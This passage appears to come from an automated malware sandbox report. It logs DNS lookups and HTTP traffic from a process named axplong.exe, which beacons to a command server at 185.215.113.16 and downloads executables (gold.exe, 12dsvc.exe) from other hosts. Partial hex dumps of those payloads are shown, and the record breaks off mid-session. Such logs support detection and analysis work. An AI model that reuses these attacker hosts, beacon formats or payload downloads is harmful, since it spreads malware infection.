                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.184.238A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.185.238A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com142.250.185.142A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406397104 CEST1.1.1.1192.168.2.50xd529No error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406455040 CEST1.1.1.1192.168.2.50xfe67No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:01.406455040 CEST1.1.1.1192.168.2.50xfe67No error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                          Sep 27, 2024 04:22:04.907892942 CEST1.1.1.1192.168.2.50xfd2eNo error (0)www.google.com65IN (0x0001)false
                                                                          Sep 27, 2024 04:22:04.907953024 CEST1.1.1.1192.168.2.50xdbfaNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:16.632402897 CEST1.1.1.1192.168.2.50xfc51No error (0)ballotnwu.site104.21.2.13A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:16.632402897 CEST1.1.1.1192.168.2.50xfc51No error (0)ballotnwu.site172.67.128.144A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:33.707178116 CEST1.1.1.1192.168.2.50x1879No error (0)ballotnwu.site172.67.128.144A (IP address)IN (0x0001)false
                                                                          Sep 27, 2024 04:22:33.707178116 CEST1.1.1.1192.168.2.50x1879No error (0)ballotnwu.site104.21.2.13A (IP address)IN (0x0001)false
                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          0192.168.2.549710185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:02.403605938 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:03.109658957 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:02 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:03.112271070 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:21:03.372349024 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:03 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 65 39 0d 0a 20 3c 63 3e 31 30 30 30 30 30 32 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 63 32 63 64 30 61 34 61 34 65 62 36 63 66 62 66 32 66 36 62 37 30 34 36 65 66 36 65 31 23 31 30 30 30 30 30 34 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 63 35 36 34 34 66 35 39 63 35 62 36 37 65 64 38 32 31 32 66 38 31 35 64 34 32 65 64 30 66 63 66 38 65 63 33 30 65 61 66 65 62 34 62 36 35 32 36 65 23 31 30 30 30 30 30 35 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 36 64 62 33 34 62 31 61 38 62 64 65 37 33 31 66 37 62 33 66 66 61 62 34 66 23 31 30 30 30 30 36 36 30 30 31 2b 2b 2b 61 61 30 65 64 33 36 35 35 34 65 31 39 66 62 66 66 64 35 37 34 34 66 36 39 63 35 38 36 37 65 65 38 32 31 34 66 38 31 35 64 62 33 34 39 36 61 33 61 39 61 37 33 30 65 38 66 38 66 62 62 66 34 39 35 34 65 61 65 31 36 30 37 32 [TRUNCATED]
                                                                          Data Ascii: 4e9 <c>1000002001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cfbf2f6b7046ef6e1#1000004001+++aa0ed36554e19fbffc5644f59c5b67ed8212f815d42ed0fcf8ec30eafeb4b6526e#1000005001+++aa0ed36554e19fbffd5744f69c5867ee8214f816db34b1a8bde731f7b3ffab4f#1000066001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a730e8f8fbbf4954eae1607267d36ac114d9a16c#1000191001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cf2f8ffb74764e0e17f3d77c77b#1000254001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a733f9f3f3a0046ef6e1#1000290001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cffefe3a35e6eeaaa636b77#1000314001+++aa0ed36554e19fbffd5744f69c5867ee8214f815dc2cd0a4a4eb6cd0e8f7be4b48bcb63421208d309642d9#1000322001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a72df9eaf8a6446fe2e1343d77c77b#1000342001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a731efe9e2b7427ee4aa636b77#1000349001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a720fffef9e1046ef6e1#1000354001+++e312d361 [TRUNCATED]
                                                                          Sep 27, 2024 04:21:03.372363091 CEST212INData Raw: 36 66 64 66 30 62 35 61 31 34 62 36 35 65 61 65 62 36 62 33 64 37 37 63 37 37 62 23 31 30 30 30 33 35 35 30 30 31 2b 2b 2b 65 33 31 32 64 33 36 31 31 65 66 34 39 66 61 31 66 34 35 61 35 66 65 61 39 66 35 63 37 63 66 31 38 32 31 36 65 35 30 61 64
                                                                          Data Ascii: 6fdf0b5a14b65eaeb6b3d77c77b#1000355001+++e312d3611ef49fa1f45a5fea9f5c7cf18216e50adc2bcce2a7e12df9b2e8b2446fe1e928766ada#1000356001+++aa0ed36554e19fbffd5744f69c5867ee8214f815db3496a3a9a72df9f2f4fd4f73eb#<d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          1192.168.2.549711185.215.113.117805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:03.440666914 CEST53OUTGET /inc/gold.exe HTTP/1.1
                                                                          Host: 185.215.113.117
                                                                          Sep 27, 2024 04:21:04.166862965 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:04 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 320000
                                                                          Last-Modified: Wed, 11 Sep 2024 19:08:04 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66e1ea94-4e200"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 67 e5 e1 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 d8 04 00 00 08 00 00 00 00 00 00 5e f7 04 00 00 20 00 00 00 00 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 10 f7 04 00 4b 00 00 00 00 00 05 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 0c 00 00 00 d8 f5 04 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELgf^ @ @`K H.textd `.rsrc@@.reloc @B@Hhp>I=NWS(`}CP?2hl<AICN/uT@$0r"_8)LsYQ%/?L7e&[z*j.8Jsn=O|ngUDGHKRT1LzF^ly{JB|`oH3VNf}J/?4nES3ArMqf{!IU/M?>0eXfiUi`wfaLwiVMi4iJps])l0i$|s+?^(b|zcbN
                                                                          Sep 27, 2024 04:21:04.166896105 CEST1236INData Raw: 88 b1 dc ef f0 76 b5 64 47 e8 65 a9 a0 5d ee 20 8b ec 22 f8 3c 78 f6 6e d5 01 ce 68 5b a3 59 2f 98 59 39 17 21 3f ef a1 db a2 cc 74 92 35 fb 06 c6 05 c6 83 13 74 92 ec ad ea 79 e5 ff 43 ef 55 2b c3 bd ac aa 7d 05 4a c9 48 a6 4b 12 bb 2c 7a 2e c7
                                                                          Data Ascii: vdGe] "<xnh[Y/Y9!?t5tyCU+}JHK,z.rP!GG9tAx;2\s]4"MS%0[\|hY::Uw_5H|zC+1J/z*Yo37`y9H%CALu=>FTX`Eg(|D
                                                                          Sep 27, 2024 04:21:04.166908979 CEST448INData Raw: cc 69 eb 75 16 57 37 9d ac b2 c6 b4 79 34 9e b8 42 da a9 ed 8d a2 96 f5 3f 23 e6 22 9d 21 07 e7 e7 bd 87 eb 40 b8 fd f5 e7 dc ad 95 83 0c 43 d9 02 65 ea b6 b9 2a 83 9a af 26 5b 4e 53 56 59 13 3e 25 d8 de 55 94 b7 1f ea 9d 56 1b 8b 52 86 8b 0f a1
                                                                          Data Ascii: iuW7y4B?#"!@Ce*&[NSVY>%UVRwt1V]bS;,T|T?p0<7`@8o%AJn&8b.[IrkV6$hXI"o_gXs{IMl$gu+
                                                                          Sep 27, 2024 04:21:04.166918993 CEST1236INData Raw: d1 cf ad 40 2b 57 d9 ae d5 0f 3a 05 a5 d9 7e 15 9f 65 8a b4 5e 16 8f 5c b2 9c 97 2e 35 4f 73 1d 7a 53 bf 72 d0 11 2a e8 78 64 18 c4 ff 01 fb a0 a2 33 e4 eb 5c a4 4d d4 b6 60 26 aa 05 0e bf 86 91 10 fe 93 4d 85 2c 64 30 d8 30 3e 8b 26 91 d0 4b 9c
                                                                          Data Ascii: @+W:~e^\.5OszSr*xd3\M`&M,d00>&KV?>%ym:.BvvS1!C?DU;mJe:Os14AqAYe%Yq)]I3-owZ2F+Jn}4o&Zbcxng`s@UbW!>O#
                                                                          Sep 27, 2024 04:21:04.166929960 CEST1236INData Raw: 73 25 4f 77 6f 02 9f e8 e4 8b d4 d1 ad c9 8e 8d e1 a3 34 b6 63 4f 6d c6 a6 c9 6c 42 2a 38 54 9a 0d ad 3c 51 f8 5f 89 ce 0a 1d d1 90 1e c6 b6 6b 7c ae 43 e7 db 36 49 57 7b b0 0d 67 14 5a ed eb a5 00 f5 b1 6d 9d cc e4 ad 33 5e dd fd 89 ef 22 c9 2b
                                                                          Data Ascii: s%Owo4cOmlB*8T<Q_k|C6IW{gZm3^"+|/R1$9^<1kp*oxQiJxc~Y*"."ti2P)f/$R`HS%Gt1%= ;`y
                                                                          Sep 27, 2024 04:21:04.166939974 CEST1236INData Raw: 36 b3 c9 c3 dd f7 e5 6e 93 61 41 15 0d 17 87 46 3d ec 2e 76 34 e4 86 8e 34 d9 ac 64 9a 81 fe 3a e1 bd c6 50 cc a4 73 b9 d7 3b 2a 5f 59 f4 9d 2f 07 cf 23 17 3e ea f4 6f 98 ea 55 91 7c e7 e3 2a 02 3c 83 f4 9a 10 92 90 da 44 90 6b 5a 00 4a 0c 7e 3e
                                                                          Data Ascii: 6naAF=.v44d:Ps;*_Y/#>oU|*<DkZJ~>(gNyqt9Pncn*`~|$T-sRkhu${CA%#~OpX29Q2yUoqPz(&pXtj%3x6FD&Iy:QcYmvd
                                                                          Sep 27, 2024 04:21:04.166954041 CEST1236INData Raw: 96 fa 49 c0 d4 d9 02 48 f6 09 8f 1b 34 ab 43 2d 65 eb 2a b1 d8 0d ba 2d 65 20 78 ae 91 37 06 45 92 f0 e5 5f b0 1a 5a c4 68 62 0f 60 f1 ca 7d c6 fa c8 ec 74 30 7f 9d 84 b8 a0 2c 5e 42 5f 76 e4 f4 e6 d4 22 b5 c8 a2 97 ef 17 38 35 87 ed a3 a2 1a 2a
                                                                          Data Ascii: IH4C-e*-e x7E_Zhb`}t0,^B_v"85*NzIy@o4WgwS7n|aJzNWxr$dP\Ht/3<\;cP0"lp+n{2p-u&5j?}`oQ,8_$6(f8jPEPI
                                                                          Sep 27, 2024 04:21:04.167032957 CEST1236INData Raw: b1 18 e7 46 e8 39 de 69 f4 80 ac 2b b3 17 96 67 aa 3f e8 c9 b8 12 b9 67 53 04 79 60 35 d0 8e 36 e0 a6 b1 ff ee 60 00 61 e5 9f b0 68 76 70 68 19 22 b3 8e a7 b1 fa e9 50 ac 8b 63 be 11 99 4a ca 75 ec e1 2f 5b aa 11 b8 1a cb db ad b2 56 46 66 94 6a
                                                                          Data Ascii: F9i+g?gSy`56`ahvph"PcJu/[VFfj-[#T=j&)#2q\Fw15=UrM8*V:><t9c8geUte_)CuV1BB4q~qRD_WzU
                                                                          Sep 27, 2024 04:21:04.167046070 CEST1236INData Raw: b7 ac cf 71 78 92 c8 b3 b4 52 ef 82 c1 8a e8 47 cb c5 5d 4c 69 8c d7 6e 4c c2 96 48 4b c8 d9 cf 39 3e 9c 31 1b b4 99 44 cc ae 5c 06 e0 ed 40 e2 f8 f9 01 1c 58 6e 29 41 c8 03 88 6d cc 05 df a6 cf 15 ad 8b c7 8b 5b 2a b8 16 4b 4f 8f 07 3c 62 76 11
                                                                          Data Ascii: qxRG]LinLHK9>1D\@Xn)Am[*KO<bvMUF/glHy lK;Q_XmFJW?6|c[JGDzCUd;m(|WrWq^_$8qT*]dDM7/3xgm
                                                                          Sep 27, 2024 04:21:04.167057037 CEST1236INData Raw: 03 26 df 75 df 2a 59 46 cf d3 e7 63 c6 9f 24 9a ef ad b5 4a bd 9e 98 9b fd 6f 6d f2 57 a2 8b 85 b4 cb dc 31 b1 99 d6 0f f5 a0 20 4e 49 ea 25 05 0b 09 58 3d 41 9e 89 95 e9 e1 82 60 29 31 02 82 54 27 06 d3 f0 54 e5 da 6c d4 f6 90 91 51 f5 7f 53 9a
                                                                          Data Ascii: &u*YFc$JomW1 NI%X=A`)1T'TlQShRH&v!.*]x6sZX\*H=Z\U<(JSgqQcwMYt:R_bsxO/WkPQ`Z_t"X&'+c[/rN$a
                                                                          Sep 27, 2024 04:21:04.171957016 CEST1236INData Raw: 42 28 40 ea d2 f1 b4 e9 3f cc 33 a0 bc 23 da 56 ad 08 a5 55 74 d6 15 77 72 4f a1 ca 62 fa 01 96 84 90 40 aa 56 c8 58 48 a1 11 b7 33 ce 76 d6 c3 10 86 dc d3 27 75 82 99 0f c8 1d 5d ba 1a c5 08 8c 87 fe 97 be 3c 4a 21 f3 38 5d b5 0f 09 e5 48 d8 c3
                                                                          Data Ascii: B(@?3#VUtwrOb@VXH3v'u]<J!8]H+%bFLfusjb+3$SRUCX\kH6cY|G:H}n'53RpG491Yg~6.E_I$F@o|j/}clM[@MuzEL{V_FK3^


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          2192.168.2.549712185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:05.370484114 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000002001&unit=246122658369
                                                                          Sep 27, 2024 04:21:06.072520018 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:05 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          3192.168.2.549713194.116.215.195805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:06.084443092 CEST51OUTGET /12dsvc.exe HTTP/1.1
                                                                          Host: 194.116.215.195
                                                                          Sep 27, 2024 04:21:06.704785109 CEST1236INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:06 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 903168
                                                                          Last-Modified: Wed, 25 Sep 2024 19:30:48 GMT
                                                                          Connection: keep-alive
                                                                          ETag: "66f464e8-dc800"
                                                                          Accept-Ranges: bytes
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b6 64 f4 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 be 0d 00 00 08 00 00 00 00 00 00 ee dc 0d 00 00 20 00 00 00 e0 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 0e 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 dc 0d 00 57 00 00 00 00 e0 0d 00 b8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0e 00 0c 00 00 00 5c db 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELdf @ `W\ H.text `.rsrc@@.reloc@BHk(Q.GQLqNqr\^vE<@=)!b=qQ..Bc<qi AQE,T~fX3~$)(8trc@i2?-8-:'I`D?/3?WP'XLzb| 2*\BHg$3p|+sKZm`wwiVtnLLd`aOT#k0D@d8p{.?Z-\W,(P&`L?ZJ,y:9rYD;S;3{c,Q+bNU/EO[
                                                                          Sep 27, 2024 04:21:06.704807043 CEST1236INData Raw: 86 c1 b6 5b 96 97 57 e7 bf 7f c6 b2 3d ad 19 72 db cc 78 1b 27 b6 9d dd 71 8d 53 22 d3 79 db f7 77 67 0e e3 1e 61 59 f3 a5 c6 8b b3 b0 df 0f 6e 8e 26 5b 45 16 81 1e 85 7a 2d 36 6a 7f 4e 31 23 12 21 0d 96 4a 9f 3c 34 2f 3b c3 68 97 fc da 7a 7f 54
                                                                          Data Ascii: [W=rx'qS"ywgaYn&[Ez-6jN1#!J<4/;hzT2UL9jE&|`4/n6hg#yDG*"7Ap;L2:@)'B'Ah6|?1+tPMdvK}#Wk'q?
                                                                          Sep 27, 2024 04:21:06.704818964 CEST1236INData Raw: f6 ba fb 2c af 09 e5 99 4b 6a 59 0f d0 04 a5 1e b4 ee 6e 03 99 9b 31 55 33 d8 ee 7b 89 72 de 5f 37 4f ce aa 4b cd 9f 7e 31 d4 0d ff bf 26 92 b6 08 78 b0 80 d7 26 89 59 a7 11 3d c3 00 15 9c ec 4e 82 46 d8 5c df ac f9 97 c3 6f 54 95 fd b4 3c a6 9a
                                                                          Data Ascii: ,KjYn1U3{r_7OK~1&x&Y=NF\oT<= i,0V,0Ni&>I/wAG*]RrGi|C>Q3n#[Mz{tL!/;9Aq(^?P@PfLm60IR&Sr6mM+A
                                                                          Sep 27, 2024 04:21:06.704832077 CEST1236INData Raw: 5a b0 80 bc 0d 3c da 2d 34 16 21 a2 9a f6 46 ba 5c 0a cc b8 87 de 58 cb 10 ba 66 09 db 32 57 e6 42 c3 bc 5c 4a d1 9e 0e d4 20 ef e2 29 ef 3f 15 07 c6 13 41 94 c6 2f ea 0c 34 d5 ac 74 47 d3 6a a6 06 f7 49 58 88 18 d9 e7 87 62 65 c5 bd e2 bb 93 c3
                                                                          Data Ascii: Z<-4!F\Xf2WB\J )?A/4tGjIXbe,TFH`(33E{^m?-g-;'e&7*n%h&?(y%i~<aqo<I2bD_|ev^!7VIf$t2rxtK4H
                                                                          Sep 27, 2024 04:21:06.704844952 CEST896INData Raw: 45 10 52 b1 0e 49 de 58 55 54 98 11 e2 cd 1e ae d2 e5 ca 34 6e ef 43 0e b0 bd f3 68 d8 3e 2a 2e b8 ac 0b df c2 e0 08 49 b3 55 70 d0 b6 51 54 c5 02 ec 2f b7 c6 e4 86 6c 65 92 fa 0c d5 c6 34 11 69 5f 1c 1d c4 21 36 5e c0 0e 10 13 59 54 ab c4 17 24
                                                                          Data Ascii: ERIXUT4nCh>*.IUpQT/le4i_!6^YT$-{I"<=vGy,:^`T@8T_Zqy8we0 jf:q6nRw/6erj3?x7'1!sT6-cwzG{)\ZX(Cy$
                                                                          Sep 27, 2024 04:21:06.704941988 CEST1236INData Raw: 14 5b 0e 2f e5 e7 87 9c 8a b9 07 1e a3 96 b3 05 1b 7d 30 e5 76 b4 02 f5 19 8d 76 24 db 35 59 51 d9 a6 5e ce f8 44 6e 2c b6 da b1 53 a4 2e 14 27 32 18 d2 68 02 65 c4 66 a5 25 db 9b 0d cb 85 0f 37 a6 5d 9a 3b 51 e5 2c b4 85 c2 da a9 4a 35 44 ee 7b
                                                                          Data Ascii: [/}0vv$5YQ^Dn,S.'2hef%7];Q,J5D{vvxuB3:/: 4C#_X(i>z)f\TI,@kE0M/P]$kt$Kc3V[e>(h9V,cds9'!p4YVxbYW<]Rq
                                                                          Sep 27, 2024 04:21:06.704955101 CEST1236INData Raw: c7 fe 8a b9 8d d3 34 98 c5 d4 d9 de 16 06 f2 f8 18 5b ab 57 2a 3a 8a 3f cc a8 1c 62 48 40 56 4a 4e bc 95 68 4a 87 97 ec 4a d1 f6 8b e1 e0 3d 7a d1 06 f2 2c 04 59 2f de 64 f8 d2 d3 da 42 3e 89 24 a7 0f 4e 88 65 8a 1c 9a 4d 15 9a df 3f 10 d6 1e 51
                                                                          Data Ascii: 4[W*:?bH@VJNhJJ=z,Y/dB>$NeM?Q##e>apIh$T #kL]Buc*0u+}v=U8D]H4`e>.u!|rRX:^7Z{&weQHOh8Bok7"gn)yj
                                                                          Sep 27, 2024 04:21:06.705005884 CEST448INData Raw: 94 50 64 c4 fd 90 8d ea 67 30 e0 bc 3b d4 6e 55 07 60 15 ee ab 5d 2e 07 7e e6 64 65 e9 39 ce d0 c6 5c 0d 06 f5 a7 f3 e1 d2 e8 ff eb 76 0b 02 29 89 66 7d 7b d6 5e e1 7a 12 7b 7f 26 58 6d f8 5d 10 65 58 e3 42 cb b1 0e 57 33 c1 07 e8 5d d0 bc d8 32
                                                                          Data Ascii: Pdg0;nU`].~de9\v)f}{^z{&Xm]eXBW3]2=<Vle0JQgeLq!kOypEm;WAuJ5t`Kldosp5X`%He0#!mf5^p
                                                                          Sep 27, 2024 04:21:06.705082893 CEST1236INData Raw: c0 0d 08 40 b3 50 71 2f a3 d3 5c 62 af 05 d5 89 d3 24 56 f3 9b 58 1a 9f 65 41 53 9f 8c e5 31 17 48 3e 60 0f c3 f8 5e 3d 9f e8 42 a4 85 e2 87 a9 46 c9 bd 86 8a b0 bf 56 fc 7c d9 6d 39 01 d1 21 c8 ea a3 41 87 67 e5 47 de 6f 70 86 66 9c 11 f1 d7 8a
                                                                          Data Ascii: @Pq/\b$VXeAS1H>`^=BFV|m9!AgGopfo5`{qBL#hI)A7%~L2&AB)3nc>*y$P3xhH'wZ';rl*LefOSAI;tHb^,YZfi9Go,
                                                                          Sep 27, 2024 04:21:06.705144882 CEST1236INData Raw: 6f 9f 71 c2 f8 74 66 d3 f3 ec 94 5f 87 89 56 52 03 77 ab d0 2a c2 f6 1d 7c 79 0e 5d da de 30 8a c8 da ca 78 58 03 b3 64 3a 23 9e 1a 8d e8 0e 92 94 59 a5 e5 be 2d c6 cc be 23 61 df df 61 9b 53 48 7e 80 9e 31 f0 ba 54 37 58 f7 8d 05 ec 90 00 36 46
                                                                          Data Ascii: oqtf_VRw*|y]0xXd:#Y-#aaSH~1T7X6F?<r?jjOLp}HYr-`i5)5W1`Lj"?x/!av2m|M}=4l,>/^K[qS.7vAW&#Zo\
                                                                          Sep 27, 2024 04:21:06.709805012 CEST1236INData Raw: ff 65 c3 8c 07 07 b0 60 61 67 39 d3 88 68 24 81 97 6e 30 d9 7b 2b d5 99 a9 85 fb 34 b1 7c 87 af 3e 32 01 41 b5 b0 59 29 60 cf bd da ac 6c 3e e1 01 ea af d4 a2 95 3d 9a c5 0d e1 b3 d4 71 2f d1 8b f5 5f bc 1e 52 d9 31 41 64 a9 17 9f 8d a2 2f bc 95
                                                                          Data Ascii: e`ag9h$n0{+4|>2AY)`l>=q/_R1Ad/N-j?vKJ"YR1Ov-;jUZ3}eO>mA-e|DC.,T#/)V)vaxfCOzjM)J9Ji^B3kNX"JW8DgRkgPwH


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          4192.168.2.549715185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
